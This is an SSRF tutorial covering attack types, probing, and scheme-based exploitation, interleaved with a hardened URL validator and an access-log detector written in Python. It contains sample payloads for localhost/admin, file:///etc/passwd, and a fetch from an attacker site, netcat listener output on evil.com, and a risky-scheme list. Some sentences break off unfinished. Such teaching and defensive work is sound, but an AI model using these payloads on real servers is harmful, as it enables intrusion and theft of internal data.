Server Side Request Forgery (SSRF) is a web application or web server vulnerability that allows an attacker to control the requests that the vulnerable server makes to other servers. In other words, the vulnerability in a web server or web application lets the attacker send requests through the web application itself. The end target is always an internal system that holds data and sits behind a firewall, IDS or IPS, and is therefore not reachable from the internet.
In simple terms, an attacker sits at his desk and orders a web server to do the job on his behalf.
As mentioned above, the target systems usually sit behind a firewall, IDS or IPS, so the attacker cannot send requests directly to the victim's server; he first has to make sure that the target machine is exploitable. So he does the following to scan the network:
- Send a request to the vulnerable web server that abuses the SSRF vulnerability.
- The web server makes a request to the victim’s server which sits behind a firewall.
- The victim’s server responds with the data.
- If the SSRF vulnerability in the server permits it, the response is sent back to the attacker.
- The attacker modifies the request and gains access using different methodologies.
Impacts of SSRF Exploit
- Attackers are able to scan the local or an external network
- Attackers are able to read files from the exploited server
- Attackers are able to take control of internal systems and the network
- Using an SSRF exploit, an attacker may be able to achieve remote code execution
Types of SSRF
There are a couple of SSRF types normally used to carry out the attack.
Direct SSRF can be carried out in a couple of different ways: (a) content-based SSRF and (b) Boolean-based SSRF.
Content-based SSRF is the most widely used type: the attacker uses the content of the fetched URL, returned in the server's response, to carry out the attack.
The Boolean-based attack is carried out when a specific URL is unreachable, or when the server returns an error message or response code to the attacker's request. The attacker then uses response codes such as 404 or 500 to carry out the exploit.
Indirect SSRF is also known as blind SSRF, because this type of attack is carried out without getting any status code or response from the target. For example, the attacker does not know whether the target server is up or down, since no status code or response is sent back from the server to show whether it is running.
The attacker normally carries out the attack based on timing differences to determine the target machine's status. He keeps trying a number of times until the connection is closed and, as noted above, uses the difference in response time to confirm whether the target host is up. If the target takes a long time to respond, the attacker concludes that the specified host is down. Indirect SSRF is the most difficult type to exploit because there is no response from the server, so it becomes a guessing game.
How to perform SSRF Exploit
Every exploit involves a great deal of probing before it becomes an "exploit". The attacker tries different techniques on the target until the right one works, and the same applies to SSRF. This process of enumerating the target is called probing.
In SSRF probing, the attacker sends a request with a specific URL as the "payload", passed through an HTTP GET parameter or through HTTP POST data; this is commonly known as the "SSRF vector". The payloads normally contain special characters such as "?" or "#".
```http
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.mybestsstoreever.com/product/stock/check%3FproductId%3D6%26storeId%3D1
```
The above is a simple request that asks the server to fetch a specific URL, and the web server returns the "stock status" to the requesting user's browser or app. If the web server is exploitable via SSRF, the attacker can intercept the request with a tool such as Burp Suite and modify it as below.
```http
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin
```
The vulnerable server in turn fetches the contents of the localhost/admin URL and returns them to the user. – This is called
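As an added example (not code from the article), here is a stock-lookup handler written first naively and then hardened: the naive version fetches whatever stockApi holds, while the hardened one allows only http(s) to an allow-listed host and refuses loopback/private addresses and URLs with embedded credentials. The backend host name and the function names are assumptions for this example.

```python
import ipaddress
from urllib.parse import urlparse

# Assumed for this example: the only backend the stock lookup legitimately
# calls, and the only schemes it needs. Anything else is refused.
ALLOWED_HOSTS = {"stock.mybestsstoreever.com"}
ALLOWED_SCHEMES = {"http", "https"}

def vulnerable_target(stock_api: str) -> str:
    """Naive handler: the stockApi value is fetched exactly as supplied,
    so http://localhost/admin or file:///etc/passwd pass straight through."""
    return stock_api

def is_internal(host: str) -> bool:
    """True for 'localhost' and for loopback, private, link-local,
    unspecified or reserved IP literals (IPv4 or IPv6)."""
    if host.lower() in ("localhost", "localhost.localdomain"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal. A production check would also resolve the name
        # and re-test the resulting addresses before connecting.
        return False
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved)

def hardened_target(stock_api: str) -> str:
    """Hardened handler: http(s) only, no embedded credentials, host must be
    on the allow-list and must not be an internal address. Raises ValueError."""
    parsed = urlparse(stock_api)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    if parsed.username is not None or parsed.password is not None:
        # Rejects http://stock.mybestsstoreever.com@localhost/admin, where the
        # allowed name is really a username and the real host is localhost.
        raise ValueError("credentials in URL not allowed")
    host = parsed.hostname or ""
    if is_internal(host) or host not in ALLOWED_HOSTS:
        raise ValueError(f"host not allowed: {host!r}")
    return stock_api

def is_allowed(stock_api: str) -> bool:
    try:
        hardened_target(stock_api)
        return True
    except ValueError:
        return False
```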
Where You Can Find SSRF Vulnerabilities
- Normally, you can find SSRF vulnerabilities wherever there is a possibility of a network request to an internal server being triggered from the internet.
- Anywhere the application makes requests to a remote server (uploading files by URL, etc.)
- Apps that use databases such as Oracle, MongoDB, MS SQL, Postgres, etc.
- Email servers
- File processing, encoding processing, attribute information processing, etc.
Different ways of SSRF Exploits
SSRF to Reflected XSS (SSRF to Cross-Site Scripting)
Simply fetch a file from an external site that contains a malicious payload and is served with an HTML content type. Example – http://vuln-web-appcom:4200/?url=http://letmehackyourserver.com/virus.svg
file:// – The file:// scheme is used to fetch a file from the server's file system.
http://example.com/vuln-ssrf.php?url=file:///etc/passwd or http://example.com/vuln-ssrf.php?url=file:///C:/Windows/win.ini
The output of http://localost/ssrf.php?image_url=file:///etc/passwd would be something like this:
dict:// – The DICT URL scheme is used to refer to definitions or word lists available via the DICT protocol:
```text
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 31126)
CLIENT libcurl 7.40.0
```
sftp:// – SFTP stands for SSH File Transfer Protocol (or Secure File Transfer Protocol); it is a separate protocol packaged with SSH that works in a similar way over a secure connection.
```text
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 37146)
```
ldap:// or ldaps:// or ldapi:// – LDAP stands for Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access a distributed directory information service.
tftp:// – Trivial File Transfer Protocol (TFTP) is a simple lockstep file transfer protocol that allows a client to get a file from, or put a file onto, a remote host.
```text
evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port 1337)
```
gopher:// – Gopher is a distributed document delivery service. It allows users to explore, search and retrieve information residing in different locations in a seamless fashion.
(host it on acttacker.com):-
```text
evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
```
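As an added detection example (not from the article), the following Python scans web access-log lines for URL-typed parameters that carry the non-http schemes or internal hosts discussed above. The parameter names are taken from this page's example URLs, and the log lines are constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlparse

# Schemes the page lists as abused through SSRF; none is needed by an app
# that only fetches images or stock data over http(s).
RISKY_SCHEMES = {"file", "dict", "sftp", "ldap", "ldaps", "ldapi", "tftp", "gopher"}
# Parameter names that carry a fetch URL in this page's examples (assumed
# to be the ones your app uses; extend the set for your own code base).
URL_PARAMS = {"url", "image_url"}
INTERNAL_HOST = re.compile(
    r"^(localhost|127\.\d+\.\d+\.\d+|10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+"
    r"|172\.(1[6-9]|2\d|3[01])\.\d+\.\d+|169\.254\.\d+\.\d+|0\.0\.0\.0|::1)$")
# Common Log Format: client, ident, user, [time], "METHOD path proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

def classify_url(value: str) -> Optional[str]:
    """Reason the value looks like an SSRF payload, or None if it looks benign."""
    p = urlparse(unquote(value))  # unquote again to catch double-encoded values
    scheme = p.scheme.lower()
    if scheme in RISKY_SCHEMES:
        return f"risky scheme {scheme}://"
    if scheme in ("http", "https") and INTERNAL_HOST.match(p.hostname or ""):
        return f"internal target {p.hostname}"
    return None

def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, parameter, reason) for every suspicious URL parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, values in parse_qs(urlparse(m["path"]).query).items():
            if name in URL_PARAMS:
                for v in values:
                    reason = classify_url(v)
                    if reason:
                        hits.append((m["ip"], name, reason))
    return hits

# Constructed sample access-log lines (not from the article).
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln-ssrf.php?url=http%3A%2F%2Fexample.org%2Fimg.png HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /vuln-ssrf.php?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1804',
    '203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET /ssrf.php?image_url=http%3A%2F%2F127.0.0.1%3A9200%2F HTTP/1.1" 200 300',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /ssrf.php?image_url=dict%3A%2F%2Fevil.com%3A1337%2F HTTP/1.1" 500 0',
]
```

The scanner only sees GET parameters because access logs do not record POST bodies; a body-carrying vector such as stockApi needs application-level logging instead.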
Scan for internal networks and ports –
What if they are running some servers in their LAN (Kibana, Elasticsearch, MongoDB, ...) that we cannot access directly from the internet because a firewall blocks them?
Mitigations
- Disable unused URL schemes
- Password-protect the internal services and add an extra layer of protection such as an IDS